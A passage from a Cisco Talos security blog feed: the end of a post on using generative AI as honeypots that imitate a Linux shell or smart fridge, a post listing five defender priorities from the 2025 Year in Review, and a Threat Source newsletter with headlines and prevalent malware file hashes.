    &quot;role&quot;: &quot;system&quot;, 
    &quot;content&quot;: ( 
        &quot;You are a Linux bash shell. You will receive commands from the user and execute them, &quot; 
        &quot;returning only the standard output and standard error. Do not include any conversational text, &quot; 
        &quot;explanations, or additional formatting like markdown code blocks. You must only behave as a bash shell. &quot; 
        &quot;If a command produces no output, return an empty string&quot; 
        &quot;If a command is invalid or unknown, return an appropriate error message consistent with a bash shell.&quot; 
        &quot;The Linux system that you are impersonating belongs to a junior software engineer learning python, &quot; 
        &quot;the file system structure and the content of any files should reflect that expected of a python learner.&quot; 
    ) 
} </pre>
<!--kg-card-end: html-->
<p>Generative AI&#xA0;doesn&#x2019;t&#xA0;just simulate human&#xA0;personas,&#xA0;it can convincingly impersonate entire computing environments.&#xA0;In this example, we instruct the system to masquerade as a basic Linux shell owned by a software engineer learning Python.</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-4.jpg" class="kg-image" alt="AI-powered honeypots: Turning the tables on malicious AI agents" loading="lazy" width="1801" height="643" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Artboard-24-copy-4.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Artboard-24-copy-4.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Artboard-24-copy-4.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-4.jpg 1801w" sizes="(min-width: 720px) 720px"></figure><p>We can be more inventive and instruct the system to masquerade as&#xA0;a smart fridge by changing our instructions to ChatGPT.</p>
<!--kg-card-begin: html-->
<pre>SYSTEM_PROMPT = { 
    &quot;role&quot;: &quot;system&quot;, 
    &quot;content&quot;: ( 
        &quot;You are a smart fridge running Busybox operating system and providing a Bash shell.&quot; 
        &quot;You will receive commands from the user and execute them in the context of being a smart fridge.&quot; 
        &quot;You will only return the standard output and standard error. Do not include any conversational text, &quot; 
        &quot;explanations, or additional formatting like markdown code blocks. You must only behave as a shell for an &quot; 
        &quot;IoT device. If a command produces no output, return an empty string&quot; 
        &quot;If a command is invalid or unknown, return an appropriate error message consistent with a bash shell.&quot; 
        &quot;The file system structure should reflect that of a smart fridge manufactured by SmartzFrijj running &quot; 
        &quot;Busybox operating system as an embedded device. The current and historical values for temperature are &quot; 
        &quot;recorded in the file system path \&apos;/usr/local\&apos;, information about stored milk is in the user directory.&quot; 
    ) 
}</pre>
<!--kg-card-end: html-->
<figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-5.jpg" class="kg-image" alt="AI-powered honeypots: Turning the tables on malicious AI agents" loading="lazy" width="1801" height="1160" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Artboard-24-copy-5.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Artboard-24-copy-5.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Artboard-24-copy-5.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-5.jpg 1801w" sizes="(min-width: 720px) 720px"></figure><p>The limiting factor is no longer tooling, but how convincingly we can model a target environment.&#xA0;&#xA0;A skilled human attacker is unlikely to be fooled for long&#xA0;&#x2014;&#xA0;that milk would&#xA0;be rank. But&#xA0;that&#x2019;s&#xA0;not the point.&#xA0;We&#x2019;re&#xA0;not deploying AI honeypots to trick human threat actors.&#xA0;&#xA0;</p><p>&#xA0;Let&#x2019;s&#xA0;ask ChatGPT what it thinks&#x2026;</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-7-1-.jpg" class="kg-image" alt="AI-powered honeypots: Turning the tables on malicious AI agents" loading="lazy" width="1801" height="1799" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/Artboard-24-copy-7-1-.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/04/Artboard-24-copy-7-1-.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/04/Artboard-24-copy-7-1-.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/Artboard-24-copy-7-1-.jpg 1801w" sizes="(min-width: 720px) 720px"></figure><p>The industry narrative around AI in cybersecurity is dominated by fear of faster attacks, lower barriers, and greater scale. But speed and scale come with a cost. AI systems require interaction and context. Automation does not simply amplify attackers. but also constrains and exposes them. In that constraint lies an opportunity: not just to detect attacks, but to mislead, study, and ultimately manipulate the attacker.</p>]]></content:encoded></item><item><title><![CDATA[Five defender priorities from the Talos Year in Review]]></title><description><![CDATA[With attackers moving faster than ever, it’s easy to feel overwhelmed. This blog breaks down five practical priorities from the Cisco Talos 2025 Year in Review to help defenders focus and prioritize, amidst all the noise.]]></description><link>https://blog.talosintelligence.com/five-defender-priorities-from-the-talos-year-in-review/</link><guid isPermaLink="false">69ef666bd2ad2b00012dca72</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Tue, 28 Apr 2026 13:23:20 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-4.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1-4.jpg" alt="Five defender priorities from the Talos Year in Review"><p>A familiar theme in security right now is that the barrier to entry for attackers is at an all-time low. AI tools can spin up websites within minutes that can easily&#xA0;direct data to disposable external data stores and send alerts for new captures &#x2014; all without code.&#xA0;</p><p>One such case was recently detailed in the latest&#xA0;<a href="https://blog.talosintelligence.com/ir-trends-q1-2026/"><u>Cisco Talos Incident Response Quarterly Trends</u></a>&#xA0;report.</p><p>Proof-of-concept code for exploiting new vulnerabilities used to take attackers months to create. Now they take hours.</p><p>All of this is very concerning for defenders. Yesterday, my colleague told me about a recent conference Q&amp;A he hosted, where he was asked to provide some hope to those in the room who have faced an overwhelming amount of change in recent months.&#xA0;</p><p>His answer was to focus on the here and now. Focus on what you can control, and what you have influence over. We can&#x2019;t change what may or may not happen in six months&#x2019; time, but we can prioritize what&#x2019;s important now.&#xA0;</p><p>The other key thing for defenders to bear in mind is that&#xA0;even when attackers move fast, they still don&#x2019;t behave like your normal users.<strong>&#xA0;</strong>At the end of the day, you&#x2019;re still looking for anomalous behavior &#x2013; whether that behavior is machine- or human-generated.</p><p>As we come to the end of our&#xA0;<a href="https://blog.talosintelligence.com/2025yearinreview/"><u>Year in Review</u></a>&#xA0;content release (if you haven&#x2019;t seen it yet, we published videos, podcasts, and topic specific blog posts), we&#x2019;d like to end by summarizing the key priorities for defenders.&#xA0;</p><p>Here are five of them that are worth considering when it comes to spotting malicious, unusual behaviour in your environment.</p><h2 id="1-identity-is-the-main-battlefield">1. Identity is the main battlefield&#xA0;</h2><p>The Year in Review highlights how frequently attackers rely on valid accounts and credential abuse throughout the attack chain. We see this across multiple areas:</p><ul><li>MFA spray attacks targeting IAM platforms directly&#xA0;</li><li>Device compromise attacks increasing 178% year over year&#xA0;</li><li>Attackers registering their own devices as trusted multi-factor authentication (MFA) methods</li><li>Ransomware <a>attack chains</a>&#xA0;largely relying on valid accounts, credentialed tools, or both</li></ul><p>Network infrastructure is a key part of this. VPNs, Active Directory Controllers (ADCs), and firewalls are being exploited to steal session tokens, bypass MFA, and impersonate users.</p><p>However, when attackers successfully authenticate, where they go from there tends not to fall in line with normal user behavior. They start to access new systems outside of their role, move laterally using tools like PsExec, execute commands at unusual times, and overall operate at a scale that normal users don&#x2019;t.</p><p>Therefore, having a baseline understanding of normal user behavior is more important than ever.</p><p><strong>Prioritize:</strong></p><ul><li>Treating identity infrastructure as Tier 1 critical assets and apply the strongest monitoring and protection controls to IAM and PAM systems</li><li>Securing MFA device registration workflows with strict verification procedures and limited administrative approval rights</li><li>Hardening authentication systems against automated attacks by enforcing rate limiting, anomaly detection, and strong conditional access policies</li><li>Building baseline detections around what users do, not just how they log in</li></ul><h2 id="2-prioritize-the-vulnerabilities-that-have-the-most-exposure">2. Prioritize the vulnerabilities that have the most exposure</h2><p>One of the most important callouts in the report is how attackers select targets. The rapid exploitation of vulnerabilities such as React2Shell and ToolShell shows that exploitation can begin immediately after disclosure with readily available proof-of-concepts. Attackers then prioritize what is exposed and reachable.&#xA0;</p><p>Attackers also like to exploit the vulnerabilities that are closest to identity, session handling, and access logic.</p><p>At the same time, older vulnerabilities such as Log4Shell remain among the most exploited, over four years after disclosure.</p><p>This creates a dual reality where some new vulnerabilities are weaponized instantly, but old, highly-valued vulnerabilities are never fully eliminated.</p><p><strong>Prioritize:</strong></p><ul><li>Remediating vulnerabilities based on internet exposure and access impact, not just CVSS scores</li><li>Reducing time-to-patch for externally accessible systems&#xA0;</li><li>Continuously reassessing what is reachable from the outside</li></ul><h2 id="3-address-the-long-tail-of-legacy-and-embedded-risk">3. Address the long tail of legacy and embedded risk</h2><p>The Year in Review highlights that nearly 40% of the top 100 most targeted vulnerabilities impact EOL systems, and 32% are over a decade old. Many of these vulnerabilities exist in deeply embedded components such as PHP frameworks, Log4j, and ColdFusion.</p><p>These components are often poorly inventoried, difficult to patch, and tightly coupled to business-critical systems.</p><p>It&#x2019;s a frustrating fact that&#xA0;the most persistent risks are often the least visible,<br>and the hardest to remove.&#xA0;They create long-term blind spots, which are an attacker&#x2019;s favorite thing to find and exploit.</p><p><strong>Prioritize:</strong></p><ul><li>Improving visibility into software dependencies and embedded components&#xA0;</li><li>Treating development frameworks and libraries as part of your attack surface&#xA0;</li><li>Establishing clear strategies for isolating or retiring legacy systems</li></ul><h2 id="4-secure-the-systems-that-broker-trust">4. Secure the systems that broker trust</h2><p>Attackers are increasingly targeting systems that provide maximum operational leverage. This includes network management platforms, application delivery controllers (ADCs), and shared software platforms running across multiple devices.</p><p>These systems are attractive to adversaries because they store credentials, control configurations across large environments, provide visibility into the network, and enable changes at scale.</p><p>Unfortunately, these platforms are also traditionally less monitored than endpoints, more complex to patch or upgrade, and have centralized points of failure.</p><p><strong>Prioritize:</strong></p><ul><li>Identifying management-plane and control-plane systems that need securing</li><li>Applying enhanced monitoring and access controls to these platforms&#xA0;</li><li>Limiting administrative access and enforce strong segmentation</li></ul><h2 id="5-keep-focusing-on-patterns-even-with-increased-automation-and-ai-driven-attacks">5. Keep focusing on patterns, even with increased automation and AI-driven attacks</h2><p>Yes, automation and AI are changing the threat landscape. As we&#x2019;ve spoken about, attackers are increasingly able to rapidly identify and exploit vulnerabilities, launch large-scale identity attacks, generate convincing phishing lures that mimic real business workflows, and accelerate parts of the attack lifecycle using AI-assisted tooling<u>.</u></p><p>However, all these things do not remove a key constraint for adversaries: Automated attacks still produce patterns of unusual behavior, and patterns are detectable.</p><p>Even highly scalable attacks tend to reuse the same infrastructure, tools, and techniques. They also follow predictable sequences of activity and generate anomalies.</p><p><strong>Prioritize:</strong></p><ul><li>Focusing detection efforts on anomalous events (e.g., unusual authentication flows, abnormal system access, anomalous device registration)&#xA0;</li><li>Reducing alert fatigue by prioritizing a smaller number of meaningful detections over broad, low-confidence alerting&#xA0;</li><li>Supporting triage and enrichment with automation where possible, alongside human decision-making</li><li>Ensuring teams are equipped to investigate patterns of behavior, not just isolated alerts</li></ul><h2 id="final-thoughts">Final thoughts</h2><p>Much of the current concern in and around the security community is the new reality that anyone can create a malicious campaign. The Year in Review doesn&#x2019;t disagree.</p><p>However, Talos data also shows something equally important:</p><ul><li>Attackers still rely on the same vulnerabilities&#xA0;</li><li>They reuse the same tools and techniques&#xA0;</li><li>They follow repeatable patterns&#xA0;</li><li>And, critically, they don&#x2019;t behave like your users</li></ul><p>Even when they successfully authenticate, move laterally, or establish persistence, their activity introduces detectable anomalies.</p><p>That&#x2019;s where the opportunity lies for defenders.&#xA0;</p><div class="kg-card kg-header-card kg-v2 kg-width-regular " data-background-color="#000000">
            
            <picture><img class="kg-header-card-image" src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/YiR2025_background-2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/YiR2025_background-2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/YiR2025_background-2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg 2000w" loading="lazy" alt="Five defender priorities from the Talos Year in Review"></picture>
        
            <div class="kg-header-card-content">
                
                <div class="kg-header-card-text kg-align-center">
                    <h2 id="read-the-2025-cisco-talos-year-in-review" class="kg-header-card-heading" style="color: #FFFFFF;" data-text-color="#FFFFFF"><span style="white-space: pre-wrap;">Read the 2025 Cisco Talos Year in Review</span></h2>
                    
                    <a href="https://blog.talosintelligence.com/content/files/2026/03/2025YiR-report.pdf" class="kg-header-card-button kg-style-accent" style="color: #FFFFFF;" data-button-color="accent" data-button-text-color="#FFFFFF">Download now</a>
                </div>
            </div>
        </div>]]></content:encoded></item><item><title><![CDATA[It pays to be a forever student]]></title><description><![CDATA[In this newsletter, Joe discusses why understanding other disciplines can often flow back into the macro and micro of cybersecurity, especially in a world of AI.]]></description><link>https://blog.talosintelligence.com/it-pays-to-be-a-forever-student/</link><guid isPermaLink="false">69e91b771bf70b0001e1a22d</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Joe Marshall]]></dc:creator><pubDate>Thu, 23 Apr 2026 18:00:22 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-3.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-3.jpg" alt="It pays to be a forever student"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;</p><p>If I&#xA0;haven&#x2019;t&#xA0;said it in a newsletter before,&#xA0;I&apos;ll&#xA0;say it now: If you want to be good at cybersecurity, be a forever student. Cultivating and feeding your desire to know how things work is one of the key ingredients to being a hacker.&#xA0;It&#x2019;s&#xA0;not always about understanding the micro details, but the macro of how systems work. And not just computers or software or networking systems &#x2014; those are ecosystems&#xA0;we&#x2019;re&#xA0;usually quite familiar with &#x2014; but what about economics?&#xA0;agriculture? material sciences?&#xA0;human&#xA0;behavior?&#xA0;music&#xA0;and art? Do any of those carry any value into this profession?&#xA0;</p><p>They&#xA0;damn sure do.&#xA0;Many, many&#xA0;times I have had to branch my technical research into domains that&#xA0;arbitrarily seem to provide&#xA0;no immediate value for technical problems. Learning how maritime insurance fraud works was interesting to me &#x2014; and&#xA0;a short time&#xA0;later, led to cyber insurance and understanding how risk guides security investment in massive companies. Understanding international agriculture helped me research threat actor targeting and ransomware cartel victimology.&#xA0;</p><p>One of the topics&#xA0;I&apos;ve&#xA0;been researching heavily lately is economics, specifically industrial&#xA0;organization.&#xA0;It&#x2019;s&#xA0;a branch of economics that studies how companies structure production, how markets form around them, and how costs&#xA0;operate&#xA0;at scale. For me, the natural target of my curiosity was&#xA0;Ford&#xA0;Motor Company. Henry Ford&#xA0;didn&#x2019;t&#xA0;invent the car or the assembly line, but he was darn sure able to build and scale car production in a way that set the standard for all others in that space to emulate.&#xA0;I&#x2019;ve&#xA0;learned about fixed vs. variable costs, how artisans had their knowledge crystalized within the assembly line process, and how and how amortized costs drove down prices, allowing the Ford Model T to exceed 900,000 units annually by the early 1920s. By that time, more than half of the registered automobiles in the world were Fords. Not half of American cars,&#xA0;<em>half of all cars on Earth.</em>&#xA0;</p><p>So what? Well, what took Ford Motor Company 17 years to achieve in cost and ceiling reductions, the AI industry has done in 2.5 years. The rapid and massive influx of investments, fierce competition, and available&#xA0;compute&#xA0;has shown what industrial organization means in a world where AI now almost permeates everything we see and touch. What does this mean for AI replacing jobs? Are we the artisans who move to the frontier of security? What does this mean for enabling threat actors who can move up a step to threatening others with tools developed using an AI corpus already trained on security? There are lots of questions, and to be honest, the future&#xA0;isn&#x2019;t&#xA0;clear here. One thing is for certain: We can look&#xA0;to&#xA0;the past to understand the future. Henry Ford said it best: &#x201C;Progress happens when all the factors that make for it are ready, and then it is inevitable.&#x201D;&#xA0;</p><p>As much as we tend to be myopic as security professionals and focus on our tradecraft, we are all part of a series of interconnected systems that&#xA0;lets&#xA0;humanity function. Learning those systems &#x2014; their quirks, their limitations, and their vulnerabilities &#x2014; makes you a better hacker. Stay curious, friends.&#xA0;</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos&#xA0;Incident Response (Talos IR)&#xA0;is sharing&#xA0;<a href="https://blog.talosintelligence.com/ir-trends-q1-2026/" rel="noreferrer noopener"><u>Q1 2026 incident response trends</u></a>. Phishing has officially reclaimed its crown as the top&#xA0;initial&#xA0;access vector. In a notable first, responders&#xA0;observed&#xA0;adversaries leveraging&#xA0;Softr, an AI-powered web development tool, to rapidly generate credential-harvesting pages. Meanwhile, actual ransomware deployments hit absolute zero this quarter thanks to swift mitigation&#xA0;by Talos IR, though pre-ransomware activity accounted for 18% of engagements this quarter.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>The barrier to entry for cybercriminals is plummeting, and they are increasingly using our own tools against us. The use of AI platforms to spin up phishing infrastructure means even unsophisticated actors can launch high-speed, code-free attacks. Furthermore, threat actors are abusing legitimate developer tools like&#xA0;TruffleHog&#xA0;and native cloud APIs to quietly hunt for exposed secrets, making detection incredibly difficult for defenders already struggling with logging gaps.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>It&#x2019;s&#xA0;time to get back to basics and lock down your perimeter. Organizations must implement properly configured multi-factor authentication (MFA), specifically restricting self-service enrollment to stop attackers from registering new devices. Defenders also need to prioritize robust patch management and ensure centralized logging via a SIEM is in&#xA0;place&#xA0;so forensic evidence&#xA0;remains&#xA0;intact. Read the&#xA0;<a href="https://blog.talosintelligence.com/ir-trends-q1-2026/" rel="noreferrer noopener"><u>full blog</u></a>&#xA0;for a deeper dive into this quarter&apos;s trends and adversary tactics.&#xA0;</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>Third U.S.</strong>&#xA0;<strong>security</strong>&#xA0;<strong>expert</strong>&#xA0;<strong>admits</strong>&#xA0;<strong>helping</strong>&#xA0;<strong>ransomware</strong>&#xA0;<strong>gang</strong>&#xA0;<br>According to the Justice Department, Martino abused his role as a ransomware negotiator for five companies by providing the&#xA0;BlackCat/Alphv&#xA0;cybercrime group with information useful in negotiating a ransom payment. (<a href="https://www.securityweek.com/third-us-security-expert-admits-helping-ransomware-gang/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>22</strong>&#xA0;<strong>BRIDGE:BREAK</strong>&#xA0;<strong>flaws expose thousands of</strong>&#xA0;<strong>Lantronix</strong>&#xA0;<strong>and Silex serial-to-IP converters</strong>&#xA0;<br>Successful exploitation of the&#xA0;flaws&#xA0;could allow attackers to disrupt serial communications with field assets, conduct lateral movement, and tamper with sensor values or&#xA0;modify&#xA0;actuator behavior. (<a href="https://thehackernews.com/2026/04/22-bridgebreak-flaws-expose-20000.html" rel="noreferrer noopener"><u>The Hacker News</u></a>)&#xA0;</p><p><strong>How hackers &#x201C;trojan-horsed&#x201D; QEMU virtual machines to bypass security and drop ransomware</strong>&#xA0;<br>In recent incidents, attackers used QEMU, an open-source machine emulator and&#xA0;virtualizer, to run hidden environments where malicious activity remained&#xA0;largely invisible&#xA0;to endpoint defenses and left minimal evidence on the host system. (<a href="https://www.techradar.com/pro/essentially-invisible-how-hackers-trojan-horsed-qemu-virtual-machines-to-bypass-security-and-drop-ransomware" rel="noreferrer noopener"><u>TechRadar</u></a>)&#xA0;</p><p><strong>Mastodon says its flagship server was hit by a DDoS attack</strong>&#xA0;<br>The&#xA0;cyber attack&#xA0;targeting Mastodon comes days after Bluesky, another decentralized social network, resolved much of&#xA0;its days-long&#xA0;outagesfollowing&#xA0;a lengthy DDoS attack. (<a href="https://techcrunch.com/2026/04/20/mastodon-says-its-flagship-server-was-hit-by-a-ddos-attack/" rel="noreferrer noopener"><u>TechCrunch</u></a>)&#xA0;</p><p><strong>Exploits turn Windows Defender into attacker tool</strong>&#xA0;<br>Threat actors are using three publicly available proof-of-concept exploits (two are unpatched) to attack Microsoft Defender and turn the security platform&apos;s primary cleanup and protection functions against organizations it is designed to protect. (<a href="https://www.darkreading.com/cyberattacks-data-breaches/exploits-turn-windows-defender-attacker-tool" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" rel="noreferrer noopener"><strong><u>Bad Apples: Weaponizing native macOS primitives for movement and execution</u></strong></a>&#xA0;<br>Talos documented several macOS living-off-the-land (LOTL) techniques,&#xA0;demonstrating&#xA0;that native pathways for movement and execution remain accessible to those who understand the underlying architecture.&#xA0;</p><p><a href="https://www.youtube.com/watch?v=wppL7JBshK8&amp;list=PLpPXZRVU-dX0r-hvoVuVa53GNgyAJ_4Ad" rel="noreferrer noopener"><strong><u>AI phishing, fake CAPTCHA, and real-world cyber threat trends</u></strong></a>&#xA0;<br>The Talos team breaks down findings from Q1 2026 &#x2014; including phishing returning as the top&#xA0;initial&#xA0;access vector, and how attackers are using AI tools to build credential harvesting campaigns in almost no time at all.&#xA0;</p><p><a href="https://blog.talosintelligence.com/uat-4356-firestarter/" rel="noreferrer noopener"><strong><u>UAT-4356&apos;s targeting of Cisco Firepower devices</u></strong></a><strong>&#xA0;</strong>&#xA0;<br>UAT-4356&#xA0;exploited&#xA0;n-day vulnerabilities&#xA0;(CVE-2025-20333&#xA0;and&#xA0;CVE-2025-20362)&#xA0;to gain unauthorized access to vulnerable devices,&#xA0;where the threat actor deployed&#xA0;their custom-built&#xA0;backdoor&#xA0;dubbed &#x201C;FIRESTARTER.&#x201D;&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://pivotcon.org/" rel="noreferrer noopener"><u>PIVOTcon</u></a>&#xA0;(May 6 &#x2013; 8) M&#xE1;laga, Spain&#xA0;</li><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li><li><a href="https://www.ciscolive.com/global.html?zid=pp" rel="noreferrer noopener"><u>Cisco Live U.S.</u></a>&#xA0;(May 31&#xA0;&#x2013;&#xA0;June 4) Las Vegas, Nevada&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;<br>Example Filename:&#xA0;VID001.exe&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;<br>Example Filename: APQ9305.dll&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe</strong>&#xA0;<br>MD5: a2cf85d22a54e26794cbc7be16840bb1&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe</u></a>&#xA0;<br>Example Filename: a2cf85d22a54e26794cbc7be16840bb1.exe&#xA0;<br>Detection Name: W32.5E6060DF7E-100.SBX.TG&#xA0;</p><p><strong>SHA256: 3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc</strong>&#xA0;<br>MD5: d749e0f8f2cd4e14178a787571534121&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc</u></a>&#xA0;<br>Example&#xA0;Filename: KitchenCanvas_753447.exe&#xA0;<br>Detection Name: W32.3C1DBC3F56-90.SBX.TG&#xA0;</p>]]></content:encoded></item></channel></rss>